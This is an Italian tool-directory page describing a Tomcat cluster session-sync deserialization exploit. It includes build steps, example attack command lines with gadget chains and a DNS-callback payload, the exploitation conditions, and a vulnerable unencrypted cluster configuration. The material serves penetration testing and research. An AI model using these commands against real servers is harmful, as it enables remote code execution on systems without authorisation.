Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
tomcat-cluster-session-sync-exp — Quando Tomcat utilizza la funzionalità integrata di sincronizzazione delle sessioni, una configurazione non sicura (senza l'uso di EncryptInterceptor) causa una vulnerabilità di deserializzazione. Tramite pacchetti appositamente costruiti, è possibile attaccare i server che utilizzano la funzionalità di sincronizzazione delle sessioni integrata di Tomcat. PS: questa non è la CVE-2020-9484; la 9484 è una vulnerabilità relativa alla persistenza delle sessioni, mentre questa riguarda la sincronizzazione del cluster delle sessioni! | Kitploit
Strumenti/GitHubGitHub/threedr3am/tomcat-cluster-session-sync-exp
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubthreedr3am/tomcat-cluster-session-sync-exp

tomcat-cluster-session-sync-exp

Vedi Repository
21437236 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Quando Tomcat utilizza la funzionalità integrata di sincronizzazione delle sessioni, una configurazione non sicura (senza l'uso di EncryptInterceptor) causa una vulnerabilità di deserializzazione. Tramite pacchetti appositamente costruiti, è possibile attaccare i server che utilizzano la funzionalità di sincronizzazione delle sessioni integrata di Tomcat. PS: questa non è la CVE-2020-9484; la 9484 è una vulnerabilità relativa alla persistenza delle sessioni, mentre questa riguarda la sincronizzazione del cluster delle sessioni!

Condividi

Lo strumento è destinato esclusivamente alla ricerca di sicurezza e all'auto-verifica interna; è vietato utilizzarlo per lanciare attacchi illegali. Le conseguenze derivanti da un uso improprio sono a carico dell'utente.

Exploit per la sincronizzazione di sessione del cluster tomcat

Questa è una vulnerabilità di deserializzazione causata da una configurazione non sicura (senza EncryptInterceptor) quando tomcat utilizza la funzionalità di sincronizzazione delle sessioni integrata. Tramite pacchetti appositamente costruiti, è possibile attaccare i server che utilizzano la sincronizzazione delle sessioni integrata di tomcat.

Utilizzo

Per prima cosa compilare il pacchetto jar:

root@kitploit:~
mvn clean compile assembly:assembly

Il pacchetto jar generato si trova nella directory target

Utilizzo, esempio:

root@kitploit:~
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"

Condizioni

  1. tomcat ha la sincronizzazione delle sessioni abilitata e non è configurato EncryptInterceptor
  2. versione di JDK inferiore a JDK8u20, JDK7u21 (non sono sicuro che sia corretto)
  3. l'endpoint di sincronizzazione è accessibile (di solito rete interna)

Configurazione della sincronizzazione di sessione di tomcat

(conf/server.xml):

root@kitploit:~
<Server>
    ...
    
    <Service>
        ...
        
        <Engine>
            ...
            
            <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
                    channelSendOptions="6">
            
                    <Manager className="org.apache.catalina.ha.session.BackupManager"
                      expireSessionsOnShutdown="false"
                      notifyListenersOnReplication="true"
                      mapSendOptions="6"/>
            
            
                    <Channel className="org.apache.catalina.tribes.group.GroupChannel">
                      <Membership className="org.apache.catalina.tribes.membership.McastService"
                        address="228.0.0.4"
                        port="45564"
                        frequency="500"
                        dropTime="3000"/>
                      <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
                        address="123.123.123.123"
                        port="5000"
                        selectorTimeout="100"
                        maxThreads="6"/>
            
                      <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
                        <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
                      </Sender>
                    </Channel>
            
                    <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
                      filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
            
                    <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
                      tempDir="/tmp/war-temp/"
                      deployDir="/tmp/war-deploy/"
                      watchDir="/tmp/war-listen/"
                      watchEnabled="false"/>
            
                    <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
            </Cluster>
        </Engine>
  </Service>
</Server>
Scarica lo strumento